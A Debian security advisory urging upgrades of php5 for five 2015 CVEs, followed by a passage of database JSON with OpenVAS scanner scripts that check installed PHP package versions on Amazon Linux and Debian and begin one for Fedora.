-------------------------------------------------------------------------
Debian Security Advisory DSA-3358-1 security@debian.org
https://www.debian.org/security/ Salvatore Bonaccorso
September 13, 2015 https://www.debian.org/security/faq
-------------------------------------------------------------------------
Package : php5
CVE ID : CVE-2015-6834 CVE-2015-6835 CVE-2015-6836 CVE-2015-6837
CVE-2015-6838
Several vulnerabilities were found in PHP, a general-purpose scripting
language commonly used for web application development.
The vulnerabilities are addressed by upgrading PHP to new upstream
versions (5.4.45 and 5.6.13), which include additional bug fixes. Please
refer to the upstream changelog for more information:
https://php.net/ChangeLog-5.php#5.4.45
https://php.net/ChangeLog-5.php#5.6.13
For the oldstable distribution (wheezy), these problems have been fixed
in version 5.4.45-0+deb7u1.
For the stable distribution (jessie), these problems have been fixed in
version 5.6.13+dfsg-0+deb8u1.
We recommend that you upgrade your php5 packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
{"openvas": [{"lastseen": "2020-03-17T22:56:25", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2016-03-17T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-670)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6838"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120660", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120660", "sourceData": "# Copyright (C) 2016 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120660\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-03-17 16:05:04 +0200 (Thu, 17 Mar 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-670)\");\n script_tag(name:\"insight\", value:\"A NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed the use of PHP functions to be used as XSLT functions within XSL stylesheets. (CVE-2015-6837, CVE-2015-6838 )A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-6834, CVE-2015-6835, CVE-2015-6836 )\");\n script_tag(name:\"solution\", value:\"Run yum update php54 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-670.html\");\n script_cve_id(\"CVE-2015-6838\", \"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"php54-xml\", rpm:\"php54-xml~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-enchant\", rpm:\"php54-enchant~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-recode\", rpm:\"php54-recode~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-mysqlnd\", rpm:\"php54-mysqlnd~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-tidy\", rpm:\"php54-tidy~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-bcmath\", rpm:\"php54-bcmath~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-mcrypt\", rpm:\"php54-mcrypt~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-cli\", rpm:\"php54-cli~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-xmlrpc\", rpm:\"php54-xmlrpc~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-dba\", rpm:\"php54-dba~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-devel\", rpm:\"php54-devel~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-intl\", rpm:\"php54-intl~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-pgsql\", rpm:\"php54-pgsql~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-mbstring\", rpm:\"php54-mbstring~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-process\", rpm:\"php54-process~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-gd\", rpm:\"php54-gd~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-pdo\", rpm:\"php54-pdo~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-embedded\", rpm:\"php54-embedded~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-mssql\", rpm:\"php54-mssql~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-soap\", rpm:\"php54-soap~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-debuginfo\", rpm:\"php54-debuginfo~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-mysql\", rpm:\"php54-mysql~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-snmp\", rpm:\"php54-snmp~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-fpm\", rpm:\"php54-fpm~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-pspell\", rpm:\"php54-pspell~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-imap\", rpm:\"php54-imap~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54\", rpm:\"php54~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-odbc\", rpm:\"php54-odbc~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-ldap\", rpm:\"php54-ldap~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php54-common\", rpm:\"php54-common~5.4.45~1.75.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:53:54", "description": "Several vulnerabilities were found in\nPHP, a general-purpose scripting language commonly used for web application\ndevelopment.\n\nThe vulnerabilities are addressed by upgrading PHP to new upstream\nversions (5.4.45 and 5.6.13), which include additional bug fixes. Please\nrefer to the upstream changelog for more information:\n\nhttps://php.net/ChangeLog-5.php#5.4.45https://php.net/ChangeLog-5.php#5.6.13", "cvss3": {}, "published": "2015-09-13T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3358-1 (php5 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6838"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703358", "href": "http://plugins.openvas.org/nasl.php?oid=703358", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3358.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3358-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703358);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\",\n \"CVE-2015-6838\");\n script_name(\"Debian Security Advisory DSA 3358-1 (php5 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-09-13 00:00:00 +0200 (Sun, 13 Sep 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3358.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"php5 on Debian Linux\");\n script_tag(name: \"insight\", value: \"This package is a metapackage that,\nwhen installed, guarantees that you have at least one of the four server-side\nversions of the PHP5 interpreter installed. Removing this package won't remove\nPHP5 from your system, however it may remove other packages that depend on this\none.\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution (wheezy),\nthese problems have been fixed in version 5.4.45-0+deb7u1.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.6.13+dfsg-0+deb8u1.\n\nWe recommend that you upgrade your php5 packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities were found in\nPHP, a general-purpose scripting language commonly used for web application\ndevelopment.\n\nThe vulnerabilities are addressed by upgrading PHP to new upstream\nversions (5.4.45 and 5.6.13), which include additional bug fixes. Please\nrefer to the upstream changelog for more information:\n\nhttps://php.net/ChangeLog-5.php#5.4.45https://php.net/ChangeLog-5.php#5.6.13\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libphp5-embed\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.4.45-0+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:59", "description": "Several vulnerabilities were found in\nPHP, a general-purpose scripting language commonly used for web application\ndevelopment.\n\nThe vulnerabilities are addressed by upgrading PHP to new upstream\nversions (5.4.45 and 5.6.13), which include additional bug fixes.", "cvss3": {}, "published": "2015-09-13T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3358-1 (php5 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6838"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703358", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703358", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3358.nasl 14278 2019-03-18 14:47:26Z cfischer $\n# Auto-generated from advisory DSA 3358-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703358\");\n script_version(\"$Revision: 14278 $\");\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\",\n \"CVE-2015-6838\");\n script_name(\"Debian Security Advisory DSA 3358-1 (php5 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:47:26 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-09-13 00:00:00 +0200 (Sun, 13 Sep 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3358.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"php5 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (wheezy),\nthese problems have been fixed in version 5.4.45-0+deb7u1.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.6.13+dfsg-0+deb8u1.\n\nWe recommend that you upgrade your php5 packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities were found in\nPHP, a general-purpose scripting language commonly used for web application\ndevelopment.\n\nThe vulnerabilities are addressed by upgrading PHP to new upstream\nversions (5.4.45 and 5.6.13), which include additional bug fixes.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libphp5-embed\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.4.45-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:28", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-07T00:00:00", "type": "openvas", "title": "Fedora Update for php FEDORA-2015-14976", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6838"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310869939", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869939", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2015-14976\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n 